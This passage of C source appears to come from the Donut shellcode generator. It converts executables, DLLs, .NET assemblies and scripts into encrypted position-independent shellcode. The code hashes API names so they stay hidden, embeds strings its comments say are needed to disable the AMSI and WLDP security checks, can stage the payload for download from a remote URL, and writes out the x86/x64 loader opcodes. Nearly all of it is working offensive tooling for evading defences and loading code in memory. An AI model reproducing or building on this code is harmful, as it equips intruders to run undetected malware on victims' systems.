296 | DPRINT("Module is VBS"); | |
297 | fi->type = DONUT_MODULE_VBS; | |
298 | fi->arch = DONUT_ARCH_ANY; | |
299 | } else | |
300 | // JScript? | |
301 | if (strcasecmp(ext, ".js") == 0) { | |
302 | DPRINT("Module is JS"); | |
303 | fi->type = DONUT_MODULE_JS; | |
304 | fi->arch = DONUT_ARCH_ANY; | |
305 | } else | |
306 | // XSL? | |
307 | if (strcasecmp(ext, ".xsl") == 0) { | |
308 | DPRINT("Module is XSL"); | |
309 | fi->type = DONUT_MODULE_XSL; | |
310 | fi->arch = DONUT_ARCH_ANY; | |
311 | } else | |
312 | // EXE? | |
313 | if (strcasecmp(ext, ".exe") == 0) { | |
314 | DPRINT("Module is EXE"); | |
315 | fi->type = DONUT_MODULE_EXE; | |
316 | } else | |
317 | // DLL? | |
318 | if (strcasecmp(ext, ".dll") == 0) { | |
319 | DPRINT("Module is DLL"); | |
320 | fi->type = DONUT_MODULE_DLL; | |
321 | } else { | |
322 | // unrecognized extension | |
323 | return DONUT_ERROR_FILE_INVALID; | |
324 | } | |
325 | ||
326 | DPRINT("Mapping %s into memory", path); | |
327 | ||
328 | err = map_file(path, fi); | |
329 | if(err != DONUT_ERROR_SUCCESS) return err; | |
330 | ||
331 | // file is EXE or DLL? | |
332 | if(fi->type == DONUT_MODULE_DLL || | |
333 | fi->type == DONUT_MODULE_EXE) | |
334 | { | |
335 | DPRINT("Checking DOS header"); | |
336 | ||
337 | if(!valid_dos_hdr(fi->map)) { | |
338 | err = DONUT_ERROR_FILE_INVALID; | |
339 | goto cleanup; | |
340 | } | |
341 | DPRINT("Checking NT header"); | |
342 | ||
343 | if(!valid_nt_hdr(fi->map)) { | |
344 | err = DONUT_ERROR_FILE_INVALID; | |
345 | goto cleanup; | |
346 | } | |
347 | DPRINT("Checking IMAGE_DATA_DIRECTORY"); | |
348 | ||
349 | dir = Dirs(fi->map); | |
350 | ||
351 | if(dir == NULL) { | |
352 | err = DONUT_ERROR_FILE_INVALID; | |
353 | goto cleanup; | |
354 | } | |
355 | DPRINT("Checking characteristics"); | |
356 | ||
357 | nt = NtHdr(fi->map); | |
358 | dll = nt->FileHeader.Characteristics & IMAGE_FILE_DLL; | |
359 | cpu = is32(fi->map); | |
360 | rva = dir[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR].VirtualAddress; | |
361 | ||
362 | // set the CPU architecture for file | |
363 | fi->arch = cpu ? DONUT_ARCH_X86 : DONUT_ARCH_X64; | |
364 | ||
365 | // if COM directory present | |
366 | if(rva != 0) { | |
367 | DPRINT("COM Directory found"); | |
368 | ||
369 | // set type to EXE or DLL assembly | |
370 | fi->type = (dll) ? DONUT_MODULE_NET_DLL : DONUT_MODULE_NET_EXE; | |
371 | ||
372 | // try read the runtime version from meta header | |
373 | strncpy(fi->ver, "v4.0.30319", DONUT_VER_LEN - 1); | |
374 | ||
375 | ofs = rva2ofs(fi->map, rva); | |
376 | if (ofs != -1) { | |
377 | cor = (PIMAGE_COR20_HEADER)(ofs + fi->map); | |
378 | rva = cor->MetaData.VirtualAddress; | |
379 | if(rva != 0) { | |
380 | ofs = rva2ofs(fi->map, rva); | |
381 | if(ofs != -1) { | |
382 | pss = (PMDSTORAGESIGNATURE)(ofs + fi->map); | |
383 | DPRINT("Runtime version : %s", (char*)pss->pVersion); | |
384 | strncpy(fi->ver, (char*)pss->pVersion, DONUT_VER_LEN - 1); | |
385 | } | |
386 | } | |
387 | } | |
388 | } | |
389 | } | |
390 | cleanup: | |
391 | if(err != DONUT_ERROR_SUCCESS) { | |
392 | unmap_file(fi); | |
393 | } | |
394 | DPRINT("Leaving."); | |
395 | return err; | |
396 | } | |
397 | ||
398 | // check if DLL exports function name | |
399 | static int is_dll_export(file_info *fi, const char *function) { | |
400 | PIMAGE_DATA_DIRECTORY dir; | |
401 | PIMAGE_EXPORT_DIRECTORY exp; | |
402 | DWORD rva, ofs, cnt; | |
403 | PDWORD sym; | |
404 | PCHAR str; | |
405 | int found = 0; | |
406 | ||
407 | DPRINT("Entering."); | |
408 | ||
409 | dir = Dirs(fi->map); | |
410 | if(dir != NULL) { | |
411 | rva = dir[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress; | |
412 | DPRINT("EAT VA : %lx", rva); | |
413 | if(rva != 0) { | |
414 | ofs = rva2ofs(fi->map, rva); | |
415 | if(ofs != -1) { | |
416 | exp = (PIMAGE_EXPORT_DIRECTORY)(fi->map + ofs); | |
417 | cnt = exp->NumberOfNames; | |
418 | DPRINT("Number of exported functions : %lx", cnt); | |
419 | ||
420 | if(cnt != 0) { | |
421 | sym = (PDWORD)(rva2ofs(fi->map, exp->AddressOfNames) + fi->map); | |
422 | // scan array for symbol | |
423 | do { | |
424 | str = (PCHAR)(rva2ofs(fi->map, sym[cnt - 1]) + fi->map); | |
425 | DPRINT("Checking %s", str); | |
426 | // if match found, exit | |
427 | if(strcmp(str, function) == 0) { | |
428 | DPRINT("Found API"); | |
429 | found = 1; | |
430 | break; | |
431 | } | |
432 | } while (--cnt); | |
433 | } | |
434 | } | |
435 | } | |
436 | } | |
437 | DPRINT("Leaving."); | |
438 | return found; | |
439 | } | |
440 | ||
441 | // returns 1 on success else <=0 | |
442 | static int CreateRandom(void *buf, uint64_t len) { | |
443 | ||
444 | #if defined(WINDOWS) | |
445 | HCRYPTPROV prov; | |
446 | int ok; | |
447 | ||
448 | // 1. acquire crypto context | |
449 | if(!CryptAcquireContext( | |
450 | &prov, NULL, NULL, | |
451 | PROV_RSA_AES, | |
452 | CRYPT_VERIFYCONTEXT | CRYPT_SILENT)) return 0; | |
453 | ||
454 | ok = (int)CryptGenRandom(prov, (DWORD)len, buf); | |
455 | CryptReleaseContext(prov, 0); | |
456 | ||
457 | return ok; | |
458 | #else | |
459 | int fd; | |
460 | uint64_t r=0; | |
461 | uint8_t *p=(uint8_t*)buf; | |
462 | ||
463 | DPRINT("Opening /dev/urandom to acquire %li bytes", len); | |
464 | fd = open("/dev/urandom", O_RDONLY); | |
465 | ||
466 | if(fd > 0) { | |
467 | for(r=0; r<len; r++, p++) { | |
468 | if(read(fd, p, 1) != 1) break; | |
469 | } | |
470 | close(fd); | |
471 | } | |
472 | DPRINT("Acquired %li of %li bytes requested", r, len); | |
473 | return r == len; | |
474 | #endif | |
475 | } | |
476 | ||
477 | // Generate a random string, not exceeding DONUT_MAX_NAME bytes | |
478 | // tbl is from https://stackoverflow.com/a/27459196 | |
479 | static int GenRandomString(void *output, uint64_t len) { | |
480 | uint8_t rnd[DONUT_MAX_NAME]; | |
481 | int i; | |
482 | char tbl[]="HMN34P67R9TWCXYF"; | |
483 | char *str = (char*)output; | |
484 | ||
485 | if(len == 0 || len > (DONUT_MAX_NAME - 1)) return 0; | |
486 | ||
487 | // generate DONUT_MAX_NAME random bytes | |
488 | if(!CreateRandom(rnd, DONUT_MAX_NAME)) return 0; | |
489 | ||
490 | // generate a string using unambiguous characters | |
491 | for(i=0; i<len; i++) { | |
492 | str[i] = tbl[rnd[i] % (sizeof(tbl) - 1)]; | |
493 | } | |
494 | str[i] = 0; | |
495 | return 1; | |
496 | } | |
497 | ||
498 | // cheapo conversion from utf8 to utf16 | |
499 | static uint64_t utf8_to_utf16(void* dst, const char* src) { | |
500 | uint16_t *out = (uint16_t*)dst; | |
501 | uint64_t i; | |
502 | ||
503 | for(i=0; src[i] != 0; i++) { | |
504 | out[i] = src[i]; | |
505 | } | |
506 | return i; | |
507 | } | |
508 | ||
509 | static int CreateModule(PDONUT_CONFIG c, file_info *fi) { | |
510 | PDONUT_MODULE mod = NULL; | |
511 | uint64_t len = 0; | |
512 | char *param, parambuf[DONUT_MAX_NAME*DONUT_MAX_PARAM+DONUT_MAX_PARAM]; | |
513 | int cnt, err=DONUT_ERROR_SUCCESS; | |
514 | ||
515 | DPRINT("Entering."); | |
516 | ||
517 | // Allocate memory for module information and contents of file | |
518 | len = sizeof(DONUT_MODULE) + fi->size; | |
519 | DPRINT("Allocating %" PRIi64 " bytes of memory for DONUT_MODULE", len); | |
520 | mod = calloc(len, 1); | |
521 | ||
522 | // Memory not allocated? exit | |
523 | if(mod == NULL) { | |
524 | return DONUT_ERROR_NO_MEMORY; | |
525 | } | |
526 | ||
527 | // Set the type of module | |
528 | mod->type = fi->type; | |
529 | ||
530 | // DotNet assembly? | |
531 | if(mod->type == DONUT_MODULE_NET_DLL || | |
532 | mod->type == DONUT_MODULE_NET_EXE) | |
533 | { | |
534 | // If no domain name specified, generate a random one | |
535 | if(c->domain[0] == 0) { | |
536 | if(!GenRandomString(c->domain, DONUT_DOMAIN_LEN)) { | |
537 | err = DONUT_ERROR_RANDOM; | |
538 | goto cleanup; | |
539 | } | |
540 | } | |
541 | // convert to unicode format. | |
542 | // wchar_t is 32-bits on linux, but 16-bit on windows. :-| | |
543 | DPRINT("Domain : %s", c->domain); | |
544 | utf8_to_utf16(mod->domain, c->domain); | |
545 | ||
546 | // Assembly is DLL? Copy the class and method | |
547 | if(mod->type == DONUT_MODULE_NET_DLL) { | |
548 | DPRINT("Class : %s", c->cls); | |
549 | utf8_to_utf16(mod->cls, c->cls); | |
550 | ||
551 | DPRINT("Method : %s", c->method); | |
552 | utf8_to_utf16(mod->method, c->method); | |
553 | } | |
554 | // If no runtime specified in configuration, use version from assembly | |
555 | if(c->runtime[0] == 0) { | |
556 | strncpy(c->runtime, fi->ver, DONUT_MAX_NAME-1); | |
557 | } | |
558 | DPRINT("Runtime : %s", c->runtime); | |
559 | utf8_to_utf16(mod->runtime, c->runtime); | |
560 | } else | |
561 | // Unmanaged DLL? check for exported api | |
562 | if(mod->type == DONUT_MODULE_DLL && | |
563 | c->method[0] != 0) | |
564 | { | |
565 | DPRINT("DLL function : %s", c->method); | |
566 | strncpy((char*)mod->method, c->method, DONUT_MAX_NAME-1); | |
567 | } | |
568 | ||
569 | // Parameters specified? | |
570 | if(c->param[0] != 0) { | |
571 | strncpy(parambuf, c->param, sizeof(parambuf)-1); | |
572 | cnt = 0; | |
573 | // Split by comma or semi-colon | |
574 | param = strtok(parambuf, ",;"); | |
575 | ||
576 | while(param != NULL && cnt < DONUT_MAX_PARAM) { | |
577 | if(strlen(param) >= DONUT_MAX_NAME) { | |
578 | DPRINT("Parameter : \"%s\" exceeds DONUT_MAX_PARAM(%i)", | |
579 | param, DONUT_MAX_NAME); | |
580 | err = DONUT_ERROR_INVALID_PARAMETER; | |
581 | goto cleanup; | |
582 | } | |
583 | DPRINT("Adding \"%s\"", param); | |
584 | // convert ansi string to wide character string | |
585 | utf8_to_utf16(mod->param[cnt++], param); | |
586 | ||
587 | // get next parameter | |
588 | param = strtok(NULL, ",;"); | |
589 | } | |
590 | // set number of parameters | |
591 | mod->param_cnt = cnt; | |
592 | } | |
593 | ||
594 | // set length of module data | |
595 | mod->len = fi->size; | |
596 | // read module into memory | |
597 | memcpy(&mod->data, fi->map, fi->size); | |
598 | // update configuration with pointer to module | |
599 | c->mod = mod; | |
600 | c->mod_len = len; | |
601 | ||
602 | cleanup: | |
603 | // if there was an error, free memory for module | |
604 | if(err != DONUT_ERROR_SUCCESS && mod != NULL) { | |
605 | free(mod); | |
606 | c->mod = NULL; | |
607 | c->mod_len = 0; | |
608 | } | |
609 | DPRINT("Leaving."); | |
610 | return err; | |
611 | } | |
612 | ||
613 | static int CreateInstance(PDONUT_CONFIG c, file_info *fi) { | |
614 | DONUT_CRYPT inst_key, mod_key; | |
615 | PDONUT_INSTANCE inst; | |
616 | uint64_t inst_len; | |
617 | uint64_t dll_hash; | |
618 | int cnt; | |
619 | ||
620 | DPRINT("Entering."); | |
621 | ||
622 | // Allocate memory for the size of instance based on the type | |
623 | DPRINT("Allocating space for instance"); | |
624 | inst_len = sizeof(DONUT_INSTANCE); | |
625 | ||
626 | // if this is a PIC instance, add the size of module | |
627 | // that will be appended to the end of structure | |
628 | if(c->inst_type == DONUT_INSTANCE_PIC) { | |
629 | DPRINT("The size of module is %" PRIi64 " bytes. " | |
630 | "Adding to size of instance.", c->mod_len); | |
631 | inst_len += c->mod_len; | |
632 | } | |
633 | // allocate zero-initialized memory for instance | |
634 | inst = (PDONUT_INSTANCE)calloc(inst_len, 1); | |
635 | ||
636 | // Memory allocation failed? exit | |
637 | if(inst == NULL) { | |
638 | return DONUT_ERROR_NO_MEMORY; | |
639 | } | |
640 | ||
641 | #if !defined(NOCRYPTO) | |
642 | DPRINT("Generating random key for instance"); | |
643 | if(!CreateRandom(&inst_key, sizeof(DONUT_CRYPT))) { | |
644 | return DONUT_ERROR_RANDOM; | |
645 | } | |
646 | memcpy(&inst->key, &inst_key, sizeof(DONUT_CRYPT)); | |
647 | ||
648 | DPRINT("Generating random key for module"); | |
649 | if(!CreateRandom(&mod_key, sizeof(DONUT_CRYPT))) { | |
650 | return DONUT_ERROR_RANDOM; | |
651 | } | |
652 | memcpy(&inst->mod_key, &mod_key, sizeof(DONUT_CRYPT)); | |
653 | ||
654 | DPRINT("Generating random string to verify decryption"); | |
655 | if(!GenRandomString(inst->sig, DONUT_SIG_LEN)) { | |
656 | return DONUT_ERROR_RANDOM; | |
657 | } | |
658 | #endif | |
659 | ||
660 | DPRINT("Generating random IV for Maru hash"); | |
661 | if(!CreateRandom(&inst->iv, MARU_IV_LEN)) { | |
662 | return DONUT_ERROR_RANDOM; | |
663 | } | |
664 | ||
665 | DPRINT("Generating hashes for API using IV: %" PRIx64, inst->iv); | |
666 | ||
667 | for(cnt=0; api_imports[cnt].module != NULL; cnt++) { | |
668 | // calculate hash for DLL string | |
669 | dll_hash = maru(api_imports[cnt].module, inst->iv); | |
670 | ||
671 | // calculate hash for API string. | |
672 | // xor with DLL hash and store in instance | |
673 | inst->api.hash[cnt] = maru(api_imports[cnt].name, inst->iv) ^ dll_hash; | |
674 | ||
675 | DPRINT("Hash for %-15s : %-22s = %" PRIX64, | |
676 | api_imports[cnt].module, | |
677 | api_imports[cnt].name, | |
678 | inst->api.hash[cnt]); | |
679 | } | |
680 | // save how many API to resolve | |
681 | inst->api_cnt = cnt; | |
682 | inst->dll_cnt = 0; | |
683 | ||
684 | strcpy(inst->dll_name[inst->dll_cnt++], "ole32.dll"); | |
685 | strcpy(inst->dll_name[inst->dll_cnt++], "oleaut32.dll"); | |
686 | strcpy(inst->dll_name[inst->dll_cnt++], "wininet.dll"); | |
687 | strcpy(inst->dll_name[inst->dll_cnt++], "mscoree.dll"); | |
688 | ||
689 | // if module is .NET assembly | |
690 | if(c->mod_type == DONUT_MODULE_NET_DLL || | |
691 | c->mod_type == DONUT_MODULE_NET_EXE) | |
692 | { | |
693 | DPRINT("Copying GUID structures and DLL strings for loading .NET assemblies"); | |
694 | ||
695 | memcpy(&inst->xIID_AppDomain, &xIID_AppDomain, sizeof(GUID)); | |
696 | memcpy(&inst->xIID_ICLRMetaHost, &xIID_ICLRMetaHost, sizeof(GUID)); | |
697 | memcpy(&inst->xCLSID_CLRMetaHost, &xCLSID_CLRMetaHost, sizeof(GUID)); | |
698 | memcpy(&inst->xIID_ICLRRuntimeInfo, &xIID_ICLRRuntimeInfo, sizeof(GUID)); | |
699 | memcpy(&inst->xIID_ICorRuntimeHost, &xIID_ICorRuntimeHost, sizeof(GUID)); | |
700 | memcpy(&inst->xCLSID_CorRuntimeHost, &xCLSID_CorRuntimeHost, sizeof(GUID)); | |
701 | } else | |
702 | // if module is VBS or JS | |
703 | if(c->mod_type == DONUT_MODULE_VBS || | |
704 | c->mod_type == DONUT_MODULE_JS) | |
705 | { | |
706 | DPRINT("Copying GUID structures and DLL strings for loading VBS/JS"); | |
707 | ||
708 | memcpy(&inst->xIID_IUnknown, &xIID_IUnknown, sizeof(GUID)); | |
709 | memcpy(&inst->xIID_IDispatch, &xIID_IDispatch, sizeof(GUID)); | |
710 | memcpy(&inst->xIID_IHost, &xIID_IHost, sizeof(GUID)); | |
711 | memcpy(&inst->xIID_IActiveScript, &xIID_IActiveScript, sizeof(GUID)); | |
712 | memcpy(&inst->xIID_IActiveScriptSite, &xIID_IActiveScriptSite, sizeof(GUID)); | |
713 | memcpy(&inst->xIID_IActiveScriptParse32, &xIID_IActiveScriptParse32, sizeof(GUID)); | |
714 | memcpy(&inst->xIID_IActiveScriptParse64, &xIID_IActiveScriptParse64, sizeof(GUID)); | |
715 | ||
716 | utf8_to_utf16(inst->wscript, "WScript"); | |
717 | utf8_to_utf16(inst->wscript_exe, "wscript.exe"); | |
718 | ||
719 | if(c->mod_type == DONUT_MODULE_VBS) { | |
720 | memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_VBScript, sizeof(GUID)); | |
721 | } else { | |
722 | memcpy(&inst->xCLSID_ScriptLanguage, &xCLSID_JScript, sizeof(GUID)); | |
723 | } | |
724 | } else | |
725 | // if module is XSL | |
726 | if(c->mod_type == DONUT_MODULE_XSL) | |
727 | { | |
728 | DPRINT("Copying GUID structures for loading XSL to instance"); | |
729 | ||
730 | memcpy(&inst->xCLSID_DOMDocument30, &xCLSID_DOMDocument30, sizeof(GUID)); | |
731 | memcpy(&inst->xIID_IXMLDOMDocument, &xIID_IXMLDOMDocument, sizeof(GUID)); | |
732 | memcpy(&inst->xIID_IXMLDOMNode, &xIID_IXMLDOMNode, sizeof(GUID)); | |
733 | } | |
734 | ||
735 | // required to disable AMSI | |
736 | strcpy(inst->amsi.s, "AMSI"); | |
737 | strcpy(inst->amsiInit, "AmsiInitialize"); | |
738 | strcpy(inst->amsiScanBuf, "AmsiScanBuffer"); | |
739 | strcpy(inst->amsiScanStr, "AmsiScanString"); | |
740 | ||
741 | strcpy(inst->clr, "CLR"); | |
742 | ||
743 | // required to disable WLDP | |
744 | strcpy(inst->wldp, "WLDP"); | |
745 | strcpy(inst->wldpQuery, "WldpQueryDynamicCodeTrust"); | |
746 | strcpy(inst->wldpIsApproved, "WldpIsClassInApprovedList"); | |
747 | ||
748 | // set the type of instance we're creating | |
749 | inst->type = c->inst_type; | |
750 | ||
751 | // if the module will be downloaded | |
752 | // set the URL parameter and request verb | |
753 | if(inst->type == DONUT_INSTANCE_URL) { | |
754 | // generate a random name for module | |
755 | // that will be saved to disk | |
756 | if(!GenRandomString(c->modname, DONUT_MAX_MODNAME)) { | |
757 | return DONUT_ERROR_RANDOM; | |
758 | } | |
759 | DPRINT("Generated random name for module : %s", c->modname); | |
760 | ||
761 | DPRINT("Setting URL parameters"); | |
762 | strcpy(inst->http.url, c->url); | |
763 | // append module name | |
764 | strcat(inst->http.url, c->modname); | |
765 | // set the request verb | |
766 | strcpy(inst->http.req, "GET"); | |
767 | ||
768 | DPRINT("Payload will attempt download from : %s", inst->http.url); | |
769 | } | |
770 | ||
771 | inst->mod_len = c->mod_len; | |
772 | inst->len = inst_len; | |
773 | c->inst = inst; | |
774 | c->inst_len = inst_len; | |
775 | ||
776 | #if !defined(NOCRYPTO) | |
777 | if(c->inst_type == DONUT_INSTANCE_URL) { | |
778 | DPRINT("encrypting module for download"); | |
779 | ||
780 | c->mod->mac = maru(inst->sig, inst->iv); | |
781 | ||
782 | donut_encrypt( | |
783 | mod_key.mk, | |
784 | mod_key.ctr, | |
785 | c->mod, | |
786 | c->mod_len); | |
787 | } | |
788 | #endif | |
789 | // if PIC, copy module to instance | |
790 | if(inst->type == DONUT_INSTANCE_PIC) { | |
791 | DPRINT("Copying module data to instance"); | |
792 | memcpy(&c->inst->module.x, c->mod, c->mod_len); | |
793 | } | |
794 | ||
795 | #if !defined(NOCRYPTO) | |
796 | DPRINT("encrypting instance"); | |
797 | ||
798 | inst->mac = maru(inst->sig, inst->iv); | |
799 | ||
800 | uint8_t *inst_data = (uint8_t*)inst + offsetof(DONUT_INSTANCE, api_cnt); | |
801 | ||
802 | donut_encrypt( | |
803 | inst_key.mk, | |
804 | inst_key.ctr, | |
805 | inst_data, | |
806 | c->inst_len - offsetof(DONUT_INSTANCE, api_cnt)); | |
807 | #endif | |
808 | DPRINT("Leaving."); | |
809 | ||
810 | return DONUT_ERROR_SUCCESS; | |
811 | } | |
812 | ||
813 | // given a configuration, create a PIC that will run from anywhere in memory | |
814 | EXPORT_FUNC | |
815 | int DonutCreate(PDONUT_CONFIG c) { | |
816 | uint8_t *pl; | |
817 | uint32_t t; | |
818 | int url_len, err = DONUT_ERROR_SUCCESS; | |
819 | FILE *fd; | |
820 | file_info fi; | |
821 | ||
822 | DPRINT("Entering."); | |
823 | ||
824 | DPRINT("Validating configuration and path of file PDONUT_CONFIG: %p", c); | |
825 | ||
826 | if(c == NULL || c->file[0] == 0) { | |
827 | return DONUT_ERROR_INVALID_PARAMETER; | |
828 | } | |
829 | ||
830 | c->mod = NULL; | |
831 | c->mod_len = 0; | |
832 | ||
833 | c->inst = NULL; | |
834 | c->inst_len = 0; | |
835 | ||
836 | c->pic = NULL; | |
837 | c->pic_len = 0; | |
838 | ||
839 | // instance not specified? | |
840 | DPRINT("Validating instance type %" PRIx32 "", c->inst_type); | |
841 | ||
842 | if(c->inst_type != DONUT_INSTANCE_PIC && | |
843 | c->inst_type != DONUT_INSTANCE_URL) { | |
844 | ||
845 | return DONUT_ERROR_INVALID_PARAMETER; | |
846 | } | |
847 | ||
848 | if(c->inst_type == DONUT_INSTANCE_URL) { | |
849 | DPRINT("Validating URL"); | |
850 | ||
851 | // no URL? exit | |
852 | if(c->url[0] == 0) { | |
853 | return DONUT_ERROR_INVALID_PARAMETER; | |
854 | } | |
855 | // doesn't begin with one of the following? exit | |
856 | if((strnicmp(c->url, "http://", 7) != 0) && | |
857 | (strnicmp(c->url, "https://", 8) != 0)) { | |
858 | ||
859 | return DONUT_ERROR_INVALID_URL; | |
860 | } | |
861 | // invalid length? | |
862 | if(strlen(c->url) <= 8) { | |
863 | return DONUT_ERROR_URL_LENGTH; | |
864 | } | |
865 | // ensure URL parameter and module name don't exceed DONUT_MAX_URL | |
866 | url_len = strlen(c->url); | |
867 | ||
868 | // if the end of string doesn't have a forward slash | |
869 | // add one more to account for it | |
870 | if(c->url[url_len - 1] != '/') { | |
871 | strcat(c->url, "/"); | |
872 | url_len++; | |
873 | } | |
874 | ||
875 | if((url_len + DONUT_MAX_MODNAME) >= DONUT_MAX_URL) { | |
876 | return DONUT_ERROR_URL_LENGTH; | |
877 | } | |
878 | } | |
879 | ||
880 | DPRINT("Validating architecture"); | |
881 | ||
882 | if(c->arch != DONUT_ARCH_X86 && | |
883 | c->arch != DONUT_ARCH_X64 && | |
884 | c->arch != DONUT_ARCH_X84 && | |
885 | c->arch != DONUT_ARCH_ANY) | |
886 | { | |
887 | return DONUT_ERROR_INVALID_ARCH; | |
888 | } | |
889 | ||
890 | DPRINT("Validating AMSI/WDLP bypass option"); | |
891 | ||
892 | if(c->bypass != DONUT_BYPASS_SKIP && | |
893 | c->bypass != DONUT_BYPASS_ABORT && | |
894 | c->bypass != DONUT_BYPASS_CONTINUE) | |
895 | { | |
896 | return DONUT_ERROR_BYPASS_INVALID; | |
897 | } | |
898 | ||
899 | // get file information | |
900 | err = get_file_info(c->file, &fi); | |
901 | if(err != DONUT_ERROR_SUCCESS) return err; | |
902 | ||
903 | // Set the module type | |
904 | c->mod_type = fi.type; | |
905 | ||
906 | // Unmanaged EXE/DLL? | |
907 | if(c->mod_type == DONUT_MODULE_DLL || | |
908 | c->mod_type == DONUT_MODULE_EXE) | |
909 | { | |
910 | DPRINT("Validating architecture %i for DLL/EXE %i", | |
911 | c->arch, fi.arch); | |
912 | // Requested shellcode is x86, but file is x64? | |
913 | // Requested shellcode is x64, but file is x86? | |
914 | if((c->arch == DONUT_ARCH_X86 && | |
915 | fi.arch == DONUT_ARCH_X64) || | |
916 | (c->arch == DONUT_ARCH_X64 && | |
917 | fi.arch == DONUT_ARCH_X86)) | |
918 | { | |
919 | err = DONUT_ERROR_ARCH_MISMATCH; | |
920 | goto cleanup; | |
921 | } | |
922 | // DLL function specified. Does it exist? | |
923 | if(c->mod_type == DONUT_MODULE_DLL && | |
924 | c->method[0] != 0) | |
925 | { | |
926 | DPRINT("Validating DLL function \"%s\" for DLL", c->method); | |
927 | if(!is_dll_export(&fi, c->method)) { | |
928 | err = DONUT_ERROR_DLL_FUNCTION; | |
929 | goto cleanup; | |
930 | } | |
931 | } | |
932 | } | |
933 | // .NET DLL assembly? | |
934 | if(c->mod_type == DONUT_MODULE_NET_DLL) { | |
935 | // DLL requires class and method | |
936 | if(c->cls[0] == 0 || c->method[0] == 0) { | |
937 | err = DONUT_ERROR_NET_PARAMS; | |
938 | goto cleanup; | |
939 | } | |
940 | } | |
941 | ||
942 | // is this an unmanaged DLL with parameters? | |
943 | if(c->mod_type == DONUT_MODULE_DLL && | |
944 | c->param[0] != 0) | |
945 | { | |
946 | // we need a DLL function | |
947 | if(c->method[0] == 0) { | |
948 | err = DONUT_ERROR_DLL_PARAM; | |
949 | goto cleanup; | |
950 | } | |
951 | } | |
952 | // 1. Create the module | |
953 | DPRINT("Creating module"); | |
954 | err = CreateModule(c, &fi); | |
955 | ||
956 | if(err != DONUT_ERROR_SUCCESS) | |
957 | goto cleanup; | |
958 | ||
959 | // 2. Create the instance | |
960 | DPRINT("Creating instance"); | |
961 | err = CreateInstance(c, &fi); | |
962 | ||
963 | if(err != DONUT_ERROR_SUCCESS) | |
964 | goto cleanup; | |
965 | ||
966 | // if DEBUG is defined, save instance to disk | |
967 | #ifdef DEBUG | |
968 | DPRINT("Saving instance to file"); | |
969 | fd = fopen("instance", "wb"); | |
970 | ||
971 | if(fd != NULL) { | |
972 | fwrite(c->inst, 1, c->inst_len, fd); | |
973 | fclose(fd); | |
974 | } | |
975 | #endif | |
976 | // 3. If the module will be stored on a remote server | |
977 | if(c->inst_type == DONUT_INSTANCE_URL) { | |
978 | DPRINT("Saving %s to disk.", c->modname); | |
979 | // save the module to disk using random name | |
980 | fd = fopen(c->modname, "wb"); | |
981 | ||
982 | if(fd != NULL) { | |
983 | fwrite(c->mod, 1, c->mod_len, fd); | |
984 | fclose(fd); | |
985 | } | |
986 | } | |
987 | // 4. calculate size of PIC + instance combined | |
988 | if(c->arch == DONUT_ARCH_X86) { | |
989 | c->pic_len = sizeof(PAYLOAD_EXE_X86) + c->inst_len + 32; | |
990 | } else | |
991 | if(c->arch == DONUT_ARCH_X64) { | |
992 | c->pic_len = sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32; | |
993 | } else | |
994 | if(c->arch == DONUT_ARCH_X84) { | |
995 | c->pic_len = sizeof(PAYLOAD_EXE_X86) + | |
996 | sizeof(PAYLOAD_EXE_X64) + c->inst_len + 32; | |
997 | } | |
998 | // 5. allocate memory for shellcode | |
999 | c->pic = malloc(c->pic_len); | |
1000 | ||
1001 | DPRINT("PIC size : %" PRIi64, c->pic_len); | |
1002 | ||
1003 | if(c->pic == NULL) { | |
1004 | err = DONUT_ERROR_NO_MEMORY; | |
1005 | goto cleanup; | |
1006 | } | |
1007 | ||
1008 | DPRINT("Inserting opcodes"); | |
1009 | // 6. insert shellcode | |
1010 | pl = (uint8_t*)c->pic; | |
1011 | // call $ + c->inst_len | |
1012 | PUT_BYTE(pl, 0xE8); | |
1013 | PUT_WORD(pl, c->inst_len); | |
1014 | PUT_BYTES(pl, c->inst, c->inst_len); | |
1015 | // pop ecx | |
1016 | PUT_BYTE(pl, 0x59); | |
1017 | ||
1018 | // x86? | |
1019 | if(c->arch == DONUT_ARCH_X86) { | |
1020 | // pop edx | |
1021 | PUT_BYTE(pl, 0x5A); | |
1022 | // push ecx | |
1023 | PUT_BYTE(pl, 0x51); | |
1024 | // push edx | |
1025 | PUT_BYTE(pl, 0x52); | |
1026 | ||
1027 | DPRINT("Copying %" PRIi64 " bytes of x86 shellcode", | |
1028 | (uint64_t)sizeof(PAYLOAD_EXE_X86)); | |
1029 | ||
1030 | PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86)); | |
1031 | } else | |
1032 | // AMD64? | |
1033 | if(c->arch == DONUT_ARCH_X64) { | |
1034 | ||
1035 | DPRINT("Copying %" PRIi64 " bytes of amd64 shellcode", | |
1036 | (uint64_t)sizeof(PAYLOAD_EXE_X64)); | |
1037 | ||
1038 | PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64)); | |
1039 | } else | |
1040 | // x86 + AMD64? | |
1041 | if(c->arch == DONUT_ARCH_X84) { | |
1042 | ||
1043 | DPRINT("Copying %" PRIi64 " bytes of x86 + amd64 shellcode", | |
1044 | (uint64_t)(sizeof(PAYLOAD_EXE_X86) + sizeof(PAYLOAD_EXE_X64))); | |
1045 | ||
1046 | // xor eax, eax | |
1047 | PUT_BYTE(pl, 0x31); | |
1048 | PUT_BYTE(pl, 0xC0); | |
1049 | // dec eax | |
1050 | PUT_BYTE(pl, 0x48); | |
1051 | // js dword x86_code | |
1052 | PUT_BYTE(pl, 0x0F); | |
1053 | PUT_BYTE(pl, 0x88); | |
1054 | PUT_WORD(pl, sizeof(PAYLOAD_EXE_X64)); | |
1055 | PUT_BYTES(pl, PAYLOAD_EXE_X64, sizeof(PAYLOAD_EXE_X64)); | |
1056 | // pop edx | |
1057 | PUT_BYTE(pl, 0x5A); | |
1058 | // push ecx | |
1059 | PUT_BYTE(pl, 0x51); | |
1060 | // push edx | |
1061 | PUT_BYTE(pl, 0x52); | |
1062 | PUT_BYTES(pl, PAYLOAD_EXE_X86, sizeof(PAYLOAD_EXE_X86)); | |
1063 | } | |
1064 | cleanup: | |
1065 | // if there was some error, release resources | |
1066 | if(err != DONUT_ERROR_SUCCESS) { | |
1067 | DonutDelete(c); | |
1068 | } | |
1069 | unmap_file(&fi); | |
1070 | DPRINT("Leaving."); | |
1071 | return err; | |
1072 | } | |
1073 | ||
1074 | // release resources allocated for configuration | |
